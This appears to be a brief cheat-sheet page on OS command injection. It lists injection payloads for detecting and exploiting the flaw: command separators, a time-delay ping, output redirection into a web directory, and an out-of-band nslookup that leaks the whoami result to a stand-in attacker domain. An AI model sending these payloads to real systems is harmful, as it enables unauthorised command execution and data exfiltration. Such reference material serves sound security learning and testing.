OS command injection
Executing arbitrary commands
param=& echo test ¶m=1|echo testBlind command injections
Detecting vulnerabilities using time delays
& ping -c 10 127.0.0.1 &Exploiting vulnerabilities by redirecting output
& whoami > /var/www/static/whoami.txt &Exploiting vulnerabilities using out-of-band (OAST) techniques
& nslookup kgji2ohoyw.web-attacker.com && nslookup `whoami`.kgji2ohoyw.web-attacker.com &Ways of injection
Command separators
Last updated